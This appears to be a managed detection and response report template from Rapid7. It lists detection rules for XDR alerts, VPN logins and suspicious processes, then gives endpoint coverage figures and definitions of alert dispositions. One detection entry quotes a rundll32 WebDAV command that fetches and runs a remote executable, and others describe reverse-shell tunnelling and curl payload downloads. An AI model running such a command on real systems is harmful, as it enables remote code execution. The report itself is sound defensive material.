Palo Alto Networks Cortex XDR - Remote PsExec-like command execution from an unsigned non-standard PsExec service Remote PsExec-like command execution from an unsigned non-standard PsExec service
Palo Alto Networks Cortex XDR - Reverse Shell Reverse Shell - 2430218738
Palo Alto Networks Cortex XDR - Signature Forgery Signature Forgery - 2953588967
Palo Alto Networks Cortex XDR - Suspicious Binary incident - Suspicious Binary incident
Palo Alto Networks Cortex XDR - Suspicious Remote Domain Account Enumeration Suspicious Remote domain account enumeration’ generated by XDR Analytics detected on host p-adsvr02 involving user premiumtrust’ and ’8745
Palo Alto Networks Cortex XDR - Suspicious Remote domain account enumeration’ generated by XDR Analytics detected on host p-adsvr02 involving user premiumtrust42684137 Suspicious Remote domain account enumeration’ generated by XDR Analytics detected on host p-adsvr02 involving user premiumtrust42684137
Palo Alto Networks Cortex XDR - User added to a Windows privileged group User added to a Windows privileged group
Palo Alto Networks Cortex XDR - VBScript File VBScript File
Suspicious Authentication - 1984 ehf This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Alviva Holding Limited This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - An Unenrolled Duo User Authenticated From a Low Cost VPN Provider This detection identified the ingress authentication of an unenrolled user using a low cost VPN. An Unenrolled user is a user with only a bypass code configured and no other 2FA device configured. When adequate setting and policies are not set to deny access to unenrolled users, threat actors can leverage the lack of security controls for authentication.
Suspicious Authentication - Authentication of Account “ils_anonymous_user” From a Low Cost VPN This detection identifies successful ingress authentication from account “ils_anonymous_user” from a low cost VPN. “ils_anonymous_user” is a password-less account that is created by web servers by default to authenticate to resources within IIS. Threat Actors has been observed leveraging this account on publicly facing servers to move laterally within systems and drop malware.

Suspicious Authentication - Chang Way Technologies This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Dedipath This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Delis LLC This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Dm Auto Eood This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - EGIHosting This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - GleSYS Internet Services AB This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Green Floid This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - HolyHosting This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - HostRoyale Technologies This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Krez 999 Eood This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - L&L Investment Ltd This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - OsetecNET This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Proton66 OOO This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Shock Hosting This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Stark Industries Solutions This detection identifies successful authentications from low-cost VPN providers.
Suspicious Authentication - Zomro This detection identifies successful authentications from low-cost VPN providers.
Suspicious Process - Binary File Signed With Stolen AnyDesk Certificate Executed This detection identifies the execution of a binary file that was signed with a certificate that was stolen from the legitimate software AnyDesk. Malicious actors use legitimate signing certificate to sign their malicious codes making it to appear that it is a trusted application.
Suspicious Process - CMD File Spawns Wscript With URL In Command Line This detection identifies ’*.cmd’ files spawning Wscript with URL in the command-line. This may be done by malicious actors attempting to download a second stage payload.
Suspicious Process - Execution Of File Hosted On A WebDav Server Using Rundll32.exe This detection identifies the execution of Rundll32, executing the DavSetCookie function of davclnt.dll, the Windows WebDAV Client library, which can be used by a malicious actor to execute a file hosted in a remote location (Webdav server).
Example Command:
rundll32.exe C:32.dll,DavSetCookie 167.172.130[.] http://167.172.130[.]12/documentos235/seca964/inscripcion528.exe
Suspicious Process - ManageEngine ToolsIQ.exe Spawning a Shell This detection identifies the ToolsIQ.exe, spawning cmd.exe or powershell.exe. ToolsIQ.exe is component of the ManageEngine’s UEMS Solution which is in part of its Remote Access solution. After a successful exploitation, Malicious actors were found to download and install the UEMS tool on the compromised machine, and ToolsIQ was used to connect and to execute other tasks in other machines on the network.
Suspicious Process - Qlik Sense Scheduler Spawning a Shell This detection identifies the Qlik Sense’s Scheduler program, spawning cmd.exe or powershell.exe. After a successful exploitation on known Qlik Sense Vulnerabilities (CVE-2023-41265 or CVE-2023-41266), malicious actors use the Scheduler to execute arbitrary commands.
Suspicious Process - SSH Reverse Shell Tunneling This detection identifies the process ‘ssh.exe’ executing with command lines that indicates reverse shell tunnel established with remote host. Malicious actors were observed abusing this to enable them to access compromised machines behind firewall or in private network from their remote host.
Suspicious Process - Use of Curl to Download a File to a Temp Directory Without SSL Verification This detection identifies the use of curl and Wget utilities to download malicious payload from external URLs and save the payload in a temp directory. Malicious actors have been observed using ‘curl’ and Wget to download second stage payloads from external URLs.
Suspicious Web Request - Possible Qlik Sense CVE-2023-41266 Exploitation This detection identifies a possible exploitation of Qlik Sense’s known path traversal vulnerability CVE-2023-41266.
Suspicious Web Requests - Possible ConnectWise ScreenConnect Exploitation On February 19, 2024, ConnectWise disclosed two vulnerabilities in their
ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect
versions 23.9.7 and earlier. This alerts triggers on the bypass path observed in a public released exploit.

Rules With New Suppressions

  • Suspicious Process - Execution From Root Of Users

Your Environment

Row

Endpoints

The Insight Agent is deployed on 1,650 of the 1,700 endpoints that your organization asked the MDR team to monitor. We encourage you to deploy the Insight Agent on the remaining endpoints so we can provide forensic analysis, hunt activities, alert recommendations for all 1,700 planned endpoints.

You have a total of 1,700 endpoint licenses. If the endpoint data provided in this report is inconsistent with planned deployment targets, contact your Customer Advisor.

Row

Endpoint Agents

97

Endpoint Agents

1,650

Endpoint Agents

1,700

Endpoint Agents

1,700

Row

Users

This section provides the total number of administrators identified in your environment.

Row

Administrators

20

Row

Non-Expiring Passwords

Non-expiring passwords are at high risk of credential theft and reuse. Malicious actors could reuse these passwords on third-party sites. Rapid7 recommends limiting the use of non-expiring passwords. Implementing user password rotation reduces the risk of unauthorized access from harvested credentials.

Row

Non Expiring

14

Service Accounts

0

Row

Users with Non-Expiring Passwords

Row

IDR Identified Administrators

The following users were observed performing administrator-level actions in your environment. Rapid7 recommends reconciling this list with the approved administrators for your organization.

Row

Applications

This section provides visibility into various categories of software observed being executed in the Company Name’s environment. Rapid7 recommends reviewing the following applications to determine if they are authorized and approved according to the Company Name’s acceptable use policy.

Row

Potentially Unwanted Programs (PUPs)

PUPs are often non-malicious in nature, but may be admin tools, browser toolbars and other types of software that may serve no business need.

Rapid7 did not identify any potentially unwanted programs in the Company Name’s environment.

Row

Remote Access Solutions

Remote access solutions can be used by threat actors to gain remote access to a system.

Rapid7 identified remote access software ‘(Zoho Assist, Citrix Receiver, OpenVPN, VNC, TeamViewer, AnyDesk, SplashTop, Chrome Remote Desktop)’ installed on several systems in the Company Name’s environment. Rapid7 recommends reviewing the software’s presence on each system to determine whether it has a business need and if the system owner is authorized to use the application.

Row

Row

Cloud Storage Solutions

Rapid7 identified cloud storage solutions ‘(Microsoft OneDrive, Box.com, Egnyte, Google Drive, iCloud)’ installed on several systems in the Company Name’s environment.

Users may upload sensitive or proprietary data to non-approved cloud storage solutions, Rapid7 recommends ensuring that users follow corporate cloud storage usage policies by uninstalling unwanted software or blocking unapproved cloud storage network traffic.

Row

Row

Imposter Domain Names

Rapid7 identified multiple registered domains potentially designed to be imposters of the Company Name’s registered domains. Rapid7 recommends reviewing and blocking the identified domains, if they serve no business need.


Imposter Domain for companyname.com

Key Terms and Definitions

Row

Managed Detection and Response Overview

When you use Rapid7 MDR services, your logs are collected and matched against curated rules. Each time an event matches certain rule criteria, an alert is sent to our MDR team, and they respond with an investigation. The following sections describe how Rapid7s MDR team defines the priority, status, and disposition of alerts, and provide an overview of our incident reports.

Row

Alert Priority

Rapid7 will prioritize alerts based on a combination of the likelihood of malicious activity and the potential impact of the detected activity.

Priority Description
Critical Activity occurred in your environment that was almost certainly a malicious event. Critical alerts require immediate response and are the highest priority for the MDR team.
High Activity occurred in your environment that was most likely a malicious event and should be prioritized for analyst review.
Medium Activity occurred in your environment that may be a malicious event and requires analyst review.
Low Activity occurred in your environment that is likely not malicious but still requires review by a Rapid7 MDR Analyst.

Row

Incident Severity

Rapid7 determines the severity of an incident based on a number of factors, including:

  • Intent: Whether the threat appears to be targeted or opportunistic/automated, and the likely objectives of the attack
  • Scope: The number and criticality of systems and users impacted
  • Ongoing Activity: Whether the incident appears to have been fully contained
Severity Incident Definition Example Incident(s)
Low A non-targeted, low-impact threat involving a small number of systems or users which is already contained by existing security controls A non-targeted phishing attack with no evidence that the recipient(s) provided credentials
Medium A non-targeted, low-impact threat impacting a small number of systems or users, but requiring additional actions from you to fully contain and eradicate the threat Malware delivered via a non-targeted phishing attack that is only partially blocked on an endpoint
High A high risk or high impact threat with no sign of active attacker activity Historical evidence of compromise on a web server, with indications of prior lateral movement within the environment
Critical A high risk or high impact threat with evidence of recent or ongoing attacker activity Evidence of a compromised web server, along with ongoing command execution and lateral movement within the environment

Row

Closed Alert Dispositions

Once an alert has been investigated, it is marked as Closed, and is assigned one of the following dispositions:

Disposition Description
Benign This event was associated with non-malicious behaviors in the context of your environment and did not require additional validation from your organization to close.
Reported Benign This event was reported to your organization and was confirmed as benign. For example, after further investigation, Rapid7 confirmed that a suspicious authorization or honeypot was benign.
Reported Malicious The event represented by this alert was associated with malicious activity and was reported to your organization. Your organization confirmed that this event was unexpected behavior and further analysis indicated a compromise. The communication resulted in changes to your environment, such as password resets or reconfigured services.
Security Test Rapid7 determined that this alert was related to security testing, and did not require customer validation to close.
Reported Security Test Rapid7 determined that this alert was associated with alerts often generated by security testing, and confirmed with your organization.
Reported Unknown Rapid7 reported this alert to your organization, but we did not complete an in-depth investigation. Your organization indicated that this event fulfilled a business use-case or that it was of no concern.
System Closed Alerts that were closed automatically without further analyst review. This includes alerts that on their own do not indicate malicious activity, but are reviewed if they are related to a high fidelity alert.
False Positive An alert was triggered that was not related to the rule logic. Rapid7 triaged the event, and submitted a tuning request to the intel team.
PUP A potentially unwanted program (PUP) or potentially unwanted application (PUA) is software that a user may perceive as unwanted or unnecessary. Such software may use an implementation that can compromise privacy or weaken the computer’s security, but is not considered malicious. Companies often bundle a wanted program download with a wrapper application and may offer to install an unwanted application, and in some cases without providing a clear opt-out method. For example, potentially unwanted programs can include software that displays intrusive advertising (adware), tracks the user’s Internet usage to sell information to advertisers (spyware), or injects its own advertising into web pages that a user looks at. Rapid7 does not typically report on PUPs unless analysis of the software leads Rapid7 to conclude that its function is malicious.

Row

Data Source Descriptions

Artifact Type Operating System Description
Prefetch Windows Rapid7 acquires prefetch entries to identify historical execution of suspicious executables, DLLs, and output files.
Services Windows Windows services are often used by attackers to ensure that malware starts on a system if the system reboots.
Scheduled Tasks Windows Windows scheduled tasks are often used by attackers to execute code remotely and to maintain malware persistence.
Registry-Based Persistence Windows The Windows Registry contains dozens of configuration options for ensuring that code executes under various circumstances including system boot, user logon, or application launches.
Running Processes Windows Running process data can provide indications of malicious processes, including libraries loaded by processes, network connections from processes, and suspicious command-line arguments.
Current Services and Startup Items Mac Attackers often use Darwin/Mac services and startup items to establish persistence on a compromised host to ensure that malware starts at system reboot.
Crontab/Scheduled Tasks Mac Attackers can use crontabs/scheduled tasks to maintain persistence on a compromised host.
Running Processes Mac Running process data can provide indications of malicious processes, including libraries loaded by processes, network connections from processes, and suspicious command-line arguments.
Sudoers Mac Attackers can modify or abuse sudoer rules to allow privilege escalation by executing a given command as another user, such as “root.”
Suid Binaries Mac Attackers can utilize these binaries as a backdoor or for privilege escalation, as they are executed as the given username, which is often “root.”
Authorized Keys Mac Attackers can implement new keys that they are capable of generating once they compromise a user account on a system. This technique can allow the attacker to establish a backdoor for later use.
Kernel Extensions Mac Kernel extensions run at the operating system’s highest privilege, making them a target for attackers to try to implement persistence on a compromised host.
Crontab/Scheduled Tasks Linux Attackers can use crontabs/scheduled tasks to maintain persistence on a compromised host.
Running Processes Linux Running process data can provide indications of malicious processes, including libraries loaded by processes, network connections from processes, and suspicious command-line arguments.
Sudoers Linux Attackers can modify or abuse sudoer rules to allow privilege escalation by executing a given command as another user, such as “root.”
Suid Binaries Linux Attackers can utilize these binaries as a backdoor or for privilege escalation, as they are executed as the given username, which is often “root.”
Kernel Modules Linux Kernel modules run at the operating system’s highest privilege, making them a target for attackers to compromise and use for rootkits.
Authorized Keys Linux Attackers can implement new keys that they are capable of generating once they compromise a user account on a system. This technique can allow the attacker to establish a backdoor for later use.

Row

Incident Reports

An incident report is created when our MDR team responds to a confirmed malicious incident in your environment. This is a detailed report providing an overview of the incident, findings details, analysis, root cause, and recommended corrective actions to prevent the likelihood of recurrence and/or improve your ability to detect and respond to similar incidents in the future.

Row

Threat Hunting

The MDR service relies on multiple methods of compromise detection within client environments. In addition to real-time alerting MDR frequently performs targeted threat intelligence-driven hunting by querying forensically-relevant data available to Rapid7 Threat Hunters. If a hunt yields a positive identification of compromise, or potential for compromise, customers will be notified immediately, provided with remediation and mitigation recommendations and a full incident report within 24 hours of the conclusion of the investigation.

Row

Endpoints

% Endpoints Covered - This represents both the overall percentage of endpoints in your organization that have Insight Agents deployed and the percentage of endpoints the MDR team is able to monitor. It is calculated using the total number of endpoints that your organization asked us to monitor, or “Planned Endpoints” in this report, and the actual number of monitored endpoints, which are referred to as “Monitored Endpoints” in this report. The number of Total Endpoint Licenses is not included as part of this percentage.

Monitored Endpoints - The number of endpoints with an Insight Agent installed, and as a result, the number of endpoints the MDR team is able to monitor.

Planned Endpoints - The total number of endpoints the MDR team expected to monitor based on information your organization provided to the MDR team. If the number of planned endpoints is greater than the number of monitored endpoints, this means that there are still endpoints that the MDR team was asked to monitor without an Insight Agent installed. The Insight Agent must be installed on all endpoints that you want the MDR team to monitor.

Total Endpoint Licenses - This is the total number of licenses purchased by your organization, and specified in your contract. This may be higher than your Planned Endpoints based on your organization’s growth estimates and contingency plans.